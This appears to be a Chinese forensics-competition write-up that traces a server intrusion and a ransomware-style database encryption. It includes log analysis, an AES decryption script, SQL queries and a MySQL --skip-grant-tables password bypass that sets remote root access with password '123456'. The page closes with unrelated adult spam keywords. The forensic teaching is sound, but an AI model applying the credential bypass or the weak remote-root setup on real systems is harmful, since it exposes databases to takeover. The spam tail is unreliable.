##/adminer.php?server=localhost&username=root&db=studient&select=score&columns[0][fun]=&columns[0][col]=&where[0][col]=&where[0][op]==&where[0][val]=趙天歌&where[2][col]=&where[2][op]==&where[2][val]=&order[0]=&limit=50&text_length=100##http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&select=score&columns[0][fun]=&columns[0][col]=&where[0][col]=&where[0][op]==&where[0][val]=張曉&where[01][col]=&where[01][op]==&where[01][val]=&order[0]=&limit=50&text_length=100192.168.232.150 - - [04/May/2021:16:36:43 +0800] "GET /adminer.php?server=localhost&username=root&db=studient&select=score HTTP/1.1" 200 10460 "http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&select=score&columns%5B0%5D%5Bfun%5D=&columns%5B0%5D%5Bcol%5D=&where%5B0%5D%5Bcol%5D=&where%5B0%5D%5Bop%5D=%3D&where%5B0%5D%5Bval%5D=%E8%B5%B5%E5%A4%A9%E6%AD%8C&where%5B2%5D%5Bcol%5D=&where%5B2%5D%5Bop%5D=%3D&where%5B2%5D%5Bval%5D=&order%5B0%5D=&limit=50&text_length=100" ##http://192.168.232.148/adminer.php?server=localhost&username=root&db=studient&select=score&columns[0][fun]=&columns[0][col]=&where[0][col]=&where[0][op]==&where[0][val]=趙天歌&where[2][col]=&where[2][op]==&where[2][val]=&order[0]=&limit=50&text_length=100

查看數據庫配置文件,看能不能從日志中審計出有效信息,發現開啟binlog

binlog是個好東西,記錄增刪改查記錄的的。(4條消息) 什么是 binlog?_xzqxiaoqing的博客-CSDN博客_binlog是什么


binlog搜尋無果,查找其他日志,這里找到還有一個localhost.log

其中記錄了很多數據庫操作,對其進行審計,日志量不大,對其審計得通過update方法共修改3人成績

和我們前面web日志審計結果相同

24 Query UPDATE `score` SET `id` = '20177884', `name` = '胡金保', `tel` = '13122787578', `idcard` = '341202200402111723', `score` = '600' WHERE `id` = '20177884' AND `name` = '胡金保' AND `name` = '胡金保' COLLATE utf8_bin AND `tel` = '13122787578' AND `idcard` = '341202200402111723' AND `score` = '564' LIMIT 124 Quit

28 Query UPDATE `score` SET `id` = '20176743', `name` = '金喆昊', `tel` = '52856616', `idcard` = '310107200511295728', `score` = '600' WHERE `id` = '20176743' AND `name` = '金喆昊' AND `name` = '金喆昊' COLLATE utf8_bin AND `tel` = '52856616' AND `idcard` = '310107200511295728' AND `score` = '538' LIMIT 128 Quit

32 Query UPDATE `score` SET `id` = '20177641', `name` = '范詩怡', `tel` = '13611843060', `idcard` = '310107200310040411', `score` = '600' WHERE `id` = '20177641' AND `name` = '范詩怡' AND `name` = '范詩怡' COLLATE utf8_bin AND `tel` = '13611843060' AND `idcard` = '310107200310040411' AND `score` = '539' LIMIT 1

名字原成績修改后成績
胡金保564600
金喆昊538600
范詩怡539600

14. 嫌疑人入侵服務器后,在數據庫中共刪除了52條學生相關記錄

同樣在日志中可以看到刪除日志

經過審計,發現一條DELETE命令就是對應一條刪除記錄的,對其計數

15. 將被篡改的數據庫修復,統計全部學生信息中,身份證為31開頭的,且分數大于540分的學生共有1048名

經數據比較,數據恢復出來的數據庫和嫌疑人入侵電腦上保存的一份studient.sql數據內容完全相同

只有導出時的信息略有不同

這個2017年有點出戲,不知道是不是時間編碼問題。

經過日志操作數據和恢復的數據進行對比,可以確定恢復的數據庫為修改前的數據庫,是一個真實的勒索,沒有撕票。所以僅需對還原得的數據庫進行操作即可。

在本地起一個數據庫,將sql文件導入,對其進行查詢,當然也能導入數據庫后導出為excel進行操作。

起數據庫的時候盡量找版本相近的,有些數據庫是向下兼容的,有些可能不太行。



SELECT COUNT(*) 身份證為31開頭的,且分數大于540分的學生 FROM score where idcard LIKE '31%' AND score > 540

王鋒老師的數據庫的課好好學

16. 將被篡改的數據庫修復,統計全部學生信息中,有12對同名的學生。


1879-1867=12人,有12個重名的

這樣快

SELECT count(*) 學生總數 FROM `score`; SELECT count(DISTINCT name) 去除重名后的學生總數 FROM `score`;

當然也可以使用excel

篩選條件設置完畢后將所有數據復制到新表,計數得1048名學生

同樣篩選同名也可以使用excel實現

將名字導入新表后進行去除重復值操作

直接刪掉12個重復值。這是用最簡單直白的方法去使用excel分析,當然excel也可以使用語句來篩選,但是個人認為這樣不如sql語句來的快,我對excel使用的比較熟練,個人認為大量復雜的需要篩選的數據用sql會快很多,很簡單的sql語句也是sql快,畢竟用excel還要導出數據。但是一些不簡單不復雜,數據量適中而自己又對excel比較熟悉的情況下,excel是非常強大的可視化工具。本人因為平時比較懶,不愛動腦子,使用大多數分析都是使用excel完成的,現在市面上凡是取證比賽類的這類的數據分析,基本上excel都可以解決,畢竟不是他的主要考點。excel真的挺好用的,大家比賽時視情況,使用自己熟悉的工具去解題。

數據庫解密

先做完計算機可知其加密方式

根據后面分析,現對整個加密的數據進行解密,在其原有腳本的基礎上,修改編寫解密腳本。

#!/usr/bin/python3 from Crypto.Cipher import AES from Crypto.Util.Padding import pad import os import time import requests import sys import hashlibfile_list = ['studient.sql.CRY','db.opt.CRY','score.frm.CRY','score.ibd.CRY'] #根據需要解密的文件進行選擇。def modify_file_inplace(filename, crypto, key, blocksize=4096):with open(filename, 'r+b') as f:plaintext = f.read(blocksize)while plaintext:if len(plaintext) < blocksize:padtext = pad(plaintext, AES.block_size, style='pkcs7')ciphertext = crypto(padtext)else:ciphertext = crypto(plaintext)f.seek(-len(plaintext), 1)f.write(ciphertext)plaintext = f.read(blocksize)machine_id = '95a10a23fca34b69aa8ab9c38230fc9e' time = '202105081333' #根據需要解密文件的時間戳進行填寫 key = hashlib.sha256((machine_id+time).encode('ascii')).hexdigest()[:32]def main():key = hashlib.sha256((machine_id+time).encode('ascii')).hexdigest()[:32]cipher = AES.new(key[:16].encode('ascii'), AES.MODE_CBC, IV=key[16:].encode('ascii'))print(key)print(key[16:].encode('ascii'))for file in file_list:modify_file_inplace(file, cipher.decrypt, key=key.encode('ascii'))os.rename(file, file+'.decrypt')print(file, 'decrypted.') main()




還原

電腦部分

17. 鏡像PC.e01對應的嫌疑人PC源盤sha256為6EEF51A3737269D631B733AB476B236E055103115D463DAF81529556C1738199

18. PC操作系統安裝時間為2021-05-02 00:30:44(格式要求:YYYY-MM-DD HH:MM:SS,如2019-03-17 14:03:27)

跑一把梭的時候提示有bitlocker加密分區,先爆搜一下恢復密鑰,解密后重新跑一遍取證再做下面的題,不然有些題不一定找得到,或者找出來是誤導項。在文件系統里直接搜“恢復密鑰”這四個字一般都能搜到,如果有修改文件名了,對磁盤用正則匹配恢復密鑰的格式。

可以對比一下解密前后,分析出來的數據會多一些,

PC類的題可以多用用取證大師,還不錯。

同樣也需要先解密后重新取證。能取出更多東西。

仿真看可以看到Eraser已經刪除過很多文件了

在桌面可以直接看到“貨5.docx”,但是打開是亂碼

office文件本質上是一個壓縮包文件,有PK頭的,所以使用壓縮工具打開,打開文件查看,發現后綴是docx但是實質上是個excel文件

修改后綴打開,可以正常打開,有很多數據先放著,等做到題目再仔細分析

wps和ms的office套件都會有這個最近打開文檔,看一看最近打開了哪些文檔,這里我們又找到兩個貨,推測貨的編號是連續的


貨三需要密碼

使用passware爆破

有獨立顯卡的同學記得在選項中勾選使用獨立顯卡,比賽時讓顯卡去跑爆破,cpu留出來進行任務調度,運行各類取證程序。

存在本地郵件軟件

在E盤找到foxmail本體

打開查看,查看完取證軟件里也要看,有些時候取證軟件能取到一些刪除的郵件和緩存。

在這找到貨2

這幾個文件是一般pc取證的時候需要重點關注的,建議一個一個打開來看,仿真的優勢就在于很直觀的體現數據,以嫌疑人的思維去操作。

在圖片處找到貨6

使用010打開,010比winhex的優點在于有很多內置模板,我們很容易可以看到最后的unknownPadding是不屬于jpg的附加數據,從文件頭看504B0304是個壓縮包,有[Content_Types].xml字段,典型的office文檔,我們將這個壓縮包導出。

也是一個excel文件


在這發現一個備份文件

實際上是一個qq的備份文件,可能會涉及到一些聊天記錄,聊天文件。

.bak文件應該是一個apk類型的備份,可能帶apk內的一些數據


這個repair文件大小剛好為102400是很整的一個數,剛好100兆,使用010分析

像是一個磁盤文件

使用取證工具掛載解析,發現一個被刪除的貨4,導出以備后續分析

這里發現一個access.log

這里有一個網站

后續碰到再分析

這里有個虛擬機,推測是之前入侵服務器用的,直接導出,使用仿真加載vmdk文件,這樣能避免遇到密碼再回來繞過密碼,還可以直接判斷服務器類型。同時放取證軟件里跑一遍,對其情況有個概覽。

存在快照即卷影副本,可能要對兩個都要分析,一般來說前面那個也很重要

這里也可以找到服務器密碼

接下來對入侵虛擬機進行分析

再2444文件夾中發現疑似遠控程序的控制端的程序

web.log疑似為加密軟件后臺接收的日志

xise中為入侵服務器使用的木馬1.php,webshell管理工具驗證了之前的猜想,是使用了webshell管理工具的,這里我也學到了看到webshell密碼是xise的考慮xise這個工具

db.php數據庫配置文件,

studient.sql疑似原本的數據庫score表導出文件,這是個好東西,解服務器題的關鍵

發現還入侵了很多網站

還有其他幾個文件,等做到再回過頭來看

桌面上這個key-server文件是用python的flask架構起一個網站,接收加密文件回傳的key值用的

發現linux爆破文件,但是設置了密碼

使用壓縮包密碼爆破工具,passware密碼破解一流

先爆破著,實際比賽時不一定要解出,綜合考慮效能。

解了很久沒接出

但是換個角度來看打開記錄可以看到其中的部分內容信息

在桌面找到一個linux連接工具winscp,其中保存的連接記錄就是鏈接被入侵主機的,說不定該程序日志中保存著首次登錄明確的時間。

發現winscp命令執行的操作是使用的putty,putty沒有日志

對檢材的基本分析結束了,接下來就是做題,遇到問題解決問題。

19. 嫌疑人破解服務器密碼使用的工具/軟件名為hydra

破解服務器密碼的使用的工具就是那么幾種,都要熟悉。

他怕我們不知道還特地留了個爆破成功的截圖

20. 嫌疑人PC中,bitlocker分區恢復秘鑰為327954-438944-621852-201003-531718-502172-098219-240251


只有bitlocker解密了,才能取到關鍵信息

21. 嫌疑人將所有學生信息拆分為6份文件

拆成了6個貨,具體過程在上面分析的地方。



22. 所有被拆分的學生信息文件中,有一份被刪除,該文件中共有學生信息339條

貨4是被刪過的

共有339條

23. 嫌疑人郵箱地址為234011677@qq.com

24. 嫌疑人曾通過QQ售賣的學生信息,買家QQ號為234011698

這里應該涉及到那個qq的備份文件

25. 嫌疑人首次訪問服務器中上傳的1.php文件的時間為15:42:43(格式要求:HH:MM:SS,如14:03:27)

26. 提取并分析服務器中的加密程序,該程序執行后會加密7種不同類型的文件

27. 嫌疑人共加密了4個文件

對/usr/local/mysql/var/studient目錄進行了加密

共加密四個文件

28. 首次成功加密文件的時間為2021-05-08 13:33:13(格式要求:YYYY-MM-DD HH:MM:SS,如2019-03-17 14:03:27)

可以看到在留下來的歷史記錄里還有兩條加密的操作

每執行一次操作都會向后臺回傳一條記錄,根據加密邏輯和程序意圖,應該是對文件夾加密的這一條。

后臺總共有4條記錄,很明顯取證軟件中的兩條對應后兩條,前面兩條的操作記錄可能已經被刪除了

這里他問首次加密成功,需要滿足加密成功和首次這兩個條件,多次加密因為文件后綴已無法滿足加密程序的判斷邏輯,所以不會執行加密操作。

查看文件修改時間,很明顯對應202105081333這一條,所以首次加密時間為2021-05-08 13:33:13,我們就是根據該條信息制作密鑰編寫解密程序。

查看具體參數,時間為2021-05-08 13:33:13.487958325 +0800

通過這個地方對文件時間戳的查詢,我們可以看到studient.sql的加密時間是遠晚于其他幾個文件的,所以對studient.sql需要使用其對應的時間戳去解密

29. 該程序對目標文件的加密方式為AES

30. 該程序對文件studient.sql進行加密時,使用的秘鑰為9ff79decd3d6fbb2

加密腳本就是一個完整的python文件,我們可以修改其內容,直接編寫解密腳本,這就是最簡單的逆向類型。各種逆向如遇到這種直接調用加密庫的可以稍微調整一下,然后將加密腳本中的encrypt改成decrypt就解密了。

hashlib.sha256((machine_id+time).encode('ascii')).hexdigest()[:32] cipher = AES.new(key[:16].encode('ascii'), AES.MODE_CBC, IV=key[16:].encode('ascii'))

studient.sql的修改時間是15:28,對應的時間戳和機器碼應該是這一條

不要看到上面有單獨的studient.sql就被他迷惑了

他問的是密鑰,而不是key的值,對于aes加密來講,密鑰還需取其前16位,我差點被他騙了。

三題小數據分析,第一二題還沒來得及做完。

取證過程中,在其電腦中又發現了新的線索。

線索1:

民警懷疑加密分區里的access.rar與另外一起入侵活動有關,可能是嫌疑人拷貝到本地的日志文件。該案中,受害網站管理員于2020年9月15日13點19分報案,稱有黑客篡改了部分網站頁面,并篡改了一張圖片,圖片文件名為:HackFindx.png,文件大小為45924 Byte

31. 該壓縮包的sha256值為

255dea58932a6eec318560643000c64338906c8c3c840a70377cd8ec549b9d4f

32. 該日志共有6079793行(6079794)

日志比較大,用各種工具打開都比較慢,簡單方法就是用個帶行數計算的編輯器打開即可,現在一般的編輯器都帶行數計算的,開啟即可。

共有6079793行日志,最有一行是空行,個人認為不算日志

打開可以看到這個工具共有6百多萬條,一般的導成excel分析是實現不了的

這就是一個相對較大的日志了,日志分析最有用的是LogParser或者三劍客進行分析,大家后續學習中至少熟練掌握兩者中的一個。

大日志先用取證工具跑一遍。這里我經過多日的苦苦搜索,找到一個還不錯的軟件,有30天的試用,可以查看日志整體的情況,工具相對較大,多線程也做得比較好,分析起來相對較快。

https://pan.baidu.com/s/1cSMfNmN2TVq-6zBxWFNKAg?pwd=GAME

肉眼審計是不現實的,所以需要用到專業的日志審計工具Log Parser,這個工具可以使用sql語句直接對日志進行查詢,這個工具還有可視化版本Log Parser Lizard只需關系sql語句即可。我也是剛開始學習這方面的知識,還沒有積累相對完整體系的查詢語句,接下來僅對題目中用到的語句進行展示和分析。希望有會日志的高手分享一下經驗。

這里的計算條數可以用Log Parser用sql語句查詢得到。

access這類nginx和apache的日志要選擇使用NCSA格式打開。

SELECT TOP 100 * FROM 'C:\Users\admin\Desktop\練習1導出文件\access.log'

使用Log Parser工具的話我們就是像使用數據庫一樣去查詢日志,而無需管其他一些東西。

對于這題,我們數一下共有多少條日志

SELECT TOP 100 * FROM 'C:\Users\admin\Desktop\練習1導出文件\access.log'

查詢失敗

使用count(1) 或count(ALL * )

SELECT count(ALL * ) FROM 'C:\Users\admin\Desktop\練習1導出文件\access.log' SELECT count(1) FROM 'C:\Users\admin\Desktop\練習1導出文件\access.log'

怎么查出來少一條,還好之前已經使用文本編輯器查看過行數了

33. 嫌疑人篡改HackFindx.png時使用的IP地址是180.121.158.139

查詢request或者referer這兩個字段中哪個包含HackFindx.png

34. 入侵發生前,嫌疑人最近一次掃描網站時所使用的IP地址是47.98.167.62

35. 接上題,這個IP地址在日志文件中出現的總次數是36656

36. 2020年內,請求不存在頁面總次數超過1000次的IP共有19個

37. 2020年內,請求不存在頁面總次數最多的IP是183.224.79.34,共有12469次

線索2:

民警懷疑加密分區里的web.rar與另外一起入侵活動有關,可能是嫌疑人拷貝到本地的網站源碼和日志文件。該案中,受害網站于2020年5月9日左右被入侵并被掛暗鏈,搜索該網站域名時會跳轉到其他違法頁面。據嫌疑人交代,入侵中曾使用了名為bypass.php的后門文件,隨后刪除了該文件。

38. 壓縮包sha256

ef4261344dca73a04eb0e8660985db9d6e85a6630e9c0a1ae1a4ed5464573201

先對網站整體架構進行分析,對各個文件進行查看。

39. 后門文件bypass.php的可能刪除時間為18:14:30至18:14:35之間(格式要求:HH:MM:SS,如14:03:27)

40. 嫌疑人為后門文件設置的密碼為admin

41. 被篡改的網站源碼文件名是index(1).php

42. 暗鏈中對應的的違法網站域名為132126.com

線索3:

據嫌疑人交代,其個人電腦的MySQL數據庫中也保存著一份公民信息,但MySQL很久未登錄賬號密碼均已經忘記了。

這題涉及到windows系統mysql取證,可以直接以仿真的形式去虛擬機中取。一個是使用取證工具直接導出數據庫。取證工具直接導出沒有什么難度,先簡單介紹一下。

取證工具

再工具箱內安裝弘聯取證工具的數據庫取證插件

直接再分析頁面點擊數據庫分析即可。

根據題目需求去對對應的數據庫中的信息分析即可。

工具還是有點問題的,不能顯示。工具不一定可靠,手工得要會,工具要熟練。

導出

將數據data目錄導出至我們自己的數據庫中,注意要選擇版本相近引擎相同的數據庫。

新建一個mysql8的數據庫,將原來的data刪除,復制data進去。后續需進行一些調錯的操作,也是一種搭建數據庫的方法。

仿真

仿真中,發現mysql并沒有設置環境變量

搜索mysql,發現是安裝了mysql的

點這個command line工具進行登錄數據庫,但是有密碼


(7條消息) Mysql8.0以上重置初始密碼的方法_Jplusztx的博客-CSDN博客_mysql8.0初始密碼

服務名無效


查看服務,服務名為mysql80

mysqld --console --skip-grant-tables --shared-memory

報錯,發現是因為程序目錄下缺少配置信息my.ini,但我們在數據目錄下發現有該配置文件,拷貝過來即可成功運行該語句

(7條消息) Mysql 80 解決忘記密碼無法跳過錯誤 mysqld --console --skip-grant-tables --shared-memory 代碼無效的問題_陸深Jason的博客-CSDN博客_mysql8 跳過密碼

已繞過密碼

43. 該數據庫有3個允許遠程登錄的賬號

mysql的賬號信息存儲在mysql系統數據庫mysql庫中,查看mysql庫中的數據

開始查詢

共有三個賬戶允許遠程登陸

C:\Program Files\MySQL\MySQL Server 8.0\bin>mysql -u root -p Enter password: * Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 8 Server version: 8.0.25 MySQL Community Server - GPLCopyright (c) 2000, 2021, Oracle and/or its affiliates.Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners.Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.mysql> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | mysql | | performance_schema | | student | | sys | +--------------------+ 5 rows in set (0.00 sec)mysql> use mysql; Database changed mysql> show tables; +------------------------------------------------------+ | Tables_in_mysql | +------------------------------------------------------+ | columns_priv | | component | | db | | default_roles | | engine_cost | | func | | general_log | | global_grants | | gtid_executed | | help_category | | help_keyword | | help_relation | | help_topic | | innodb_index_stats | | innodb_table_stats | | password_history | | plugin | | procs_priv | | proxies_priv | | replication_asynchronous_connection_failover | | replication_asynchronous_connection_failover_managed | | role_edges | | server_cost | | servers | | slave_master_info | | slave_relay_log_info | | slave_worker_info | | slow_log | | tables_priv | | time_zone | | time_zone_leap_second | | time_zone_name | | time_zone_transition | | time_zone_transition_type | | user | +------------------------------------------------------+ 35 rows in set (0.08 sec)mysql> select user,host from user; +------------------+-----------+ | user | host | +------------------+-----------+ | sae_user | % | | student | % | | zhao4 | % | | mysql.infoschema | localhost | | mysql.session | localhost | | mysql.sys | localhost | | root | localhost | +------------------+-----------+ 7 rows in set (0.00 sec)mysql>

44. student表中,info字段的數據類型是BLOB

mysql> use student; Database changed mysql> show tables; +-------------------+ | Tables_in_student | +-------------------+ | student | +-------------------+ 1 row in set (0.00 sec) mysql> describe student; +-------+------+------+-----+---------+-------+ | Field | Type | Null | Key | Default | Extra | +-------+------+------+-----+---------+-------+ | info | blob | YES | | NULL | | +-------+------+------+-----+---------+-------+ 1 row in set (0.04 sec)

45. 該數據庫中共記錄了學生信息4條

由于student數據庫是blob類型的數據,且root用戶不允許外聯,而且同學們對sql語句比較生疏,所以我們設置root用戶允許外聯,修改root密碼,停止繞過密碼,使用navicat連接查看。

mysql> select host, user, authentication_string, plugin from mysql.user; +-----------+------------------+------------------------------------------------------------------------+-----------------------+ | host | user | authentication_string | plugin | +-----------+------------------+------------------------------------------------------------------------+-----------------------+ | % | sae_user | *97D8E5ED2EE9FE9809C66F39EE89AAC6436A6BD2 | mysql_native_password | | % | student | *1308E0FCD43112F8D948AB093F54892CB7B220AA | mysql_native_password | | % | zhao4 | *E34812A167F82B0880CEC1F835BE786C42E3E66A | mysql_native_password | | localhost | mysql.infoschema | $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED | caching_sha2_password | | localhost | mysql.session | $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED | caching_sha2_password | | localhost | mysql.sys | $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED | caching_sha2_password | | localhost | root | *97D8E5ED2EE9FE9809C66F39EE89AAC6436A6BD2 | mysql_native_password | +-----------+------------------+------------------------------------------------------------------------+-----------------------+ 7 rows in set (0.00 sec)mysql> use mysql; Database changed mysql> update user set host='%' where user = 'root'; Query OK, 1 row affected (0.02 sec) Rows matched: 1 Changed: 1 Warnings: 0 mysql> ALTER USER 'root'@'%' IDENTIFIED WITH MYSQL_NATIVE_PASSWORD BY '123456'; Query OK, 0 rows affected (0.02 sec) mysql> flush privileges; Query OK, 0 rows affected (0.06 sec) mysql> select host, user, authentication_string, plugin from mysql.user; +-----------+------------------+------------------------------------------------------------------------+-----------------------+ | host | user | authentication_string | plugin | +-----------+------------------+------------------------------------------------------------------------+-----------------------+ | % | root | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | mysql_native_password | | % | sae_user | *97D8E5ED2EE9FE9809C66F39EE89AAC6436A6BD2 | mysql_native_password | | % | student | *1308E0FCD43112F8D948AB093F54892CB7B220AA | mysql_native_password | | % | zhao4 | *E34812A167F82B0880CEC1F835BE786C42E3E66A | mysql_native_password | | localhost | mysql.infoschema | $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED | caching_sha2_password | | localhost | mysql.session | $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED | caching_sha2_password | | localhost | mysql.sys | $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED | caching_sha2_password | +-----------+------------------+------------------------------------------------------------------------+-----------------------+ 7 rows in set (0.00 sec) mysql> exit Bye

將之前的窗口全部關閉,重啟服務即可遠程連接。



可以看到這個blob數據為一個圖像,其中有4條數據

總結

以上是生活随笔為你收集整理的2021 河北取证比武决赛个人赛 题解 入侵溯源的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

国产69精品久久久久app下载 | 精品无码成人片一区二区98 | 日本一卡2卡3卡四卡精品网站 | 福利一区二区三区视频在线观看 | 成人av无码一区二区三区 | 国产精品久久久久久久9999 | 精品人人妻人人澡人人爽人人 | 日产精品高潮呻吟av久久 | 久久天天躁夜夜躁狠狠 | 日韩精品成人一区二区三区 | 国产成人精品优优av | 狠狠色欧美亚洲狠狠色www | 人人妻人人澡人人爽人人精品 | 亚洲熟妇色xxxxx欧美老妇 | 亚洲 日韩 欧美 成人 在线观看 | 无码吃奶揉捏奶头高潮视频 | 国产无遮挡又黄又爽又色 | 老熟女乱子伦 | 无码精品国产va在线观看dvd | 国产乱人无码伦av在线a | 18禁黄网站男男禁片免费观看 | 亚洲精品美女久久久久久久 | 真人与拘做受免费视频一 | 日本熟妇乱子伦xxxx | 少妇激情av一区二区 | 色一情一乱一伦一视频免费看 | 一本久久a久久精品亚洲 | 久久这里只有精品视频9 | aa片在线观看视频在线播放 | 小sao货水好多真紧h无码视频 | 日本一本二本三区免费 | 亚洲精品一区二区三区大桥未久 | 高潮毛片无遮挡高清免费视频 | 少妇无套内谢久久久久 | 久久久国产精品无码免费专区 | 国产成人午夜福利在线播放 | 日韩 欧美 动漫 国产 制服 | 国产黑色丝袜在线播放 | 国产疯狂伦交大片 | 成人三级无码视频在线观看 | 亚洲码国产精品高潮在线 | 国产婷婷色一区二区三区在线 | 日韩欧美群交p片內射中文 | 2020久久香蕉国产线看观看 | 麻豆国产人妻欲求不满 | 亚洲精品国产品国语在线观看 | 在线亚洲高清揄拍自拍一品区 | 久久99精品久久久久婷婷 | 亚洲乱码中文字幕在线 | 国产人成高清在线视频99最全资源 | 色狠狠av一区二区三区 | 亚洲中文字幕无码中文字在线 | 未满成年国产在线观看 | 六十路熟妇乱子伦 | 亚洲中文无码av永久不收费 | 1000部啪啪未满十八勿入下载 | 精品一区二区不卡无码av | 国产美女精品一区二区三区 | 欧美放荡的少妇 | 少妇无码av无码专区在线观看 | 亚洲精品中文字幕久久久久 | 亚洲精品中文字幕 | 日韩欧美中文字幕在线三区 | 疯狂三人交性欧美 | 国产精品99爱免费视频 | 蜜臀av在线观看 在线欧美精品一区二区三区 | 亚洲中文字幕va福利 | 久久熟妇人妻午夜寂寞影院 | 影音先锋中文字幕无码 | 真人与拘做受免费视频 | 精品国偷自产在线视频 | 一个人看的www免费视频在线观看 | 撕开奶罩揉吮奶头视频 | 女人色极品影院 | 无码人妻av免费一区二区三区 | 波多野结衣 黑人 | 国产免费久久久久久无码 | 久久精品成人欧美大片 | 动漫av一区二区在线观看 | 免费无码av一区二区 | 无码帝国www无码专区色综合 | 日本免费一区二区三区最新 | 久久人人爽人人人人片 | 免费无码肉片在线观看 | av无码久久久久不卡免费网站 | 久久综合九色综合欧美狠狠 | 无码人妻久久一区二区三区不卡 | 一本久久a久久精品vr综合 | 欧美第一黄网免费网站 | 中文字幕人成乱码熟女app | 国产农村妇女aaaaa视频 撕开奶罩揉吮奶头视频 | 久久久av男人的天堂 | 久久久国产一区二区三区 | 中文字幕无码热在线视频 | 久久久久久久久888 | 日本精品人妻无码77777 天堂一区人妻无码 | 青春草在线视频免费观看 | 大肉大捧一进一出好爽视频 | 国产亚洲精品久久久ai换 | 在线播放亚洲第一字幕 | 久久精品成人欧美大片 | 无码人中文字幕 | 婷婷丁香五月天综合东京热 | 无码av中文字幕免费放 | 午夜精品久久久久久久久 | 亚洲精品午夜无码电影网 | 久久久无码中文字幕久... | 亚洲精品一区二区三区大桥未久 | 人妻尝试又大又粗久久 | 亚洲精品国产品国语在线观看 | 欧美老人巨大xxxx做受 | 国产精品久久久久无码av色戒 | 十八禁真人啪啪免费网站 | 无码人妻少妇伦在线电影 | 日韩精品一区二区av在线 | 欧美35页视频在线观看 | 精品久久综合1区2区3区激情 | 国产精品亚洲一区二区三区喷水 | 亚洲娇小与黑人巨大交 | 人人澡人人透人人爽 | 真人与拘做受免费视频 | 天堂а√在线中文在线 | 国产成人一区二区三区在线观看 | 又大又硬又爽免费视频 | 又大又紧又粉嫩18p少妇 | 蜜桃av抽搐高潮一区二区 | 亚洲精品国偷拍自产在线麻豆 | 午夜精品一区二区三区的区别 | 久久97精品久久久久久久不卡 | 国产亚洲精品久久久ai换 | 精品无码国产一区二区三区av | 狠狠躁日日躁夜夜躁2020 | 丰满人妻一区二区三区免费视频 | 少妇性俱乐部纵欲狂欢电影 | 亚洲国产av精品一区二区蜜芽 | 亚洲综合伊人久久大杳蕉 | 国产精品亚洲一区二区三区喷水 | 色综合视频一区二区三区 | 欧美午夜特黄aaaaaa片 | 美女黄网站人色视频免费国产 | 亚洲中文无码av永久不收费 | 久久精品人妻少妇一区二区三区 | 国产三级精品三级男人的天堂 | 亚洲爆乳精品无码一区二区三区 | 日韩欧美群交p片內射中文 | 久热国产vs视频在线观看 | 国产精品亚洲一区二区三区喷水 | 国产精品久久久av久久久 | 国产av人人夜夜澡人人爽麻豆 | 成人综合网亚洲伊人 | 国精品人妻无码一区二区三区蜜柚 | 男人的天堂2018无码 | 久久亚洲日韩精品一区二区三区 | 亚洲小说图区综合在线 | 亚洲精品午夜国产va久久成人 | 成熟女人特级毛片www免费 | 国产小呦泬泬99精品 | 高潮毛片无遮挡高清免费视频 | 免费看少妇作爱视频 | 在线观看免费人成视频 | 亲嘴扒胸摸屁股激烈网站 | 奇米影视7777久久精品 | 国产精品久久久 | 中文毛片无遮挡高清免费 | 久久99热只有频精品8 | 国产精品对白交换视频 | 午夜精品久久久久久久 | a在线观看免费网站大全 | 国产午夜亚洲精品不卡 | 日本丰满护士爆乳xxxx | 精品国偷自产在线 | 狠狠色欧美亚洲狠狠色www | 亚洲va中文字幕无码久久不卡 | 少妇太爽了在线观看 | 永久免费精品精品永久-夜色 | 奇米影视888欧美在线观看 | 欧美日本日韩 | 亚洲精品国产精品乱码视色 | 欧美精品免费观看二区 | 国产亚洲美女精品久久久2020 | 波多野结衣aⅴ在线 | 欧美丰满少妇xxxx性 | 人人妻人人澡人人爽人人精品浪潮 | 国产精品久久久久无码av色戒 | 亚洲综合在线一区二区三区 | 色欲av亚洲一区无码少妇 | 亚洲狠狠色丁香婷婷综合 | √天堂资源地址中文在线 | 中文字幕人妻丝袜二区 | 久久精品人人做人人综合 | 午夜精品久久久内射近拍高清 | 亚洲热妇无码av在线播放 | 国产精品资源一区二区 | 无码人妻丰满熟妇区五十路百度 | 久久国产精品偷任你爽任你 | а天堂中文在线官网 | 国产两女互慰高潮视频在线观看 | 色五月丁香五月综合五月 | 成人av无码一区二区三区 | 性生交片免费无码看人 | 国产偷抇久久精品a片69 | 四十如虎的丰满熟妇啪啪 | 欧美精品国产综合久久 | 国产猛烈高潮尖叫视频免费 | 人妻尝试又大又粗久久 | 亚洲七七久久桃花影院 | 兔费看少妇性l交大片免费 | 亚洲中文字幕无码一久久区 | 国产激情无码一区二区 | 人妻夜夜爽天天爽三区 | a国产一区二区免费入口 | 一个人看的www免费视频在线观看 | 久久精品中文字幕大胸 | 国产人成高清在线视频99最全资源 | 狠狠色丁香久久婷婷综合五月 | 97无码免费人妻超级碰碰夜夜 | 精品成人av一区二区三区 | 久久久久久亚洲精品a片成人 | 欧美丰满熟妇xxxx性ppx人交 | 日本va欧美va欧美va精品 | 俺去俺来也www色官网 | 欧美日韩综合一区二区三区 | 色婷婷综合中文久久一本 | 99久久人妻精品免费二区 | 色婷婷av一区二区三区之红樱桃 | 在教室伦流澡到高潮hnp视频 | 欧美xxxx黑人又粗又长 | 中文字幕无码热在线视频 | 无码精品国产va在线观看dvd | 久久久国产一区二区三区 | 夜夜躁日日躁狠狠久久av | 精品乱码久久久久久久 | 国产一区二区不卡老阿姨 | 蜜臀av在线观看 在线欧美精品一区二区三区 | 国产成人一区二区三区在线观看 | 99精品久久毛片a片 | 中文字幕精品av一区二区五区 | 亚洲综合精品香蕉久久网 | 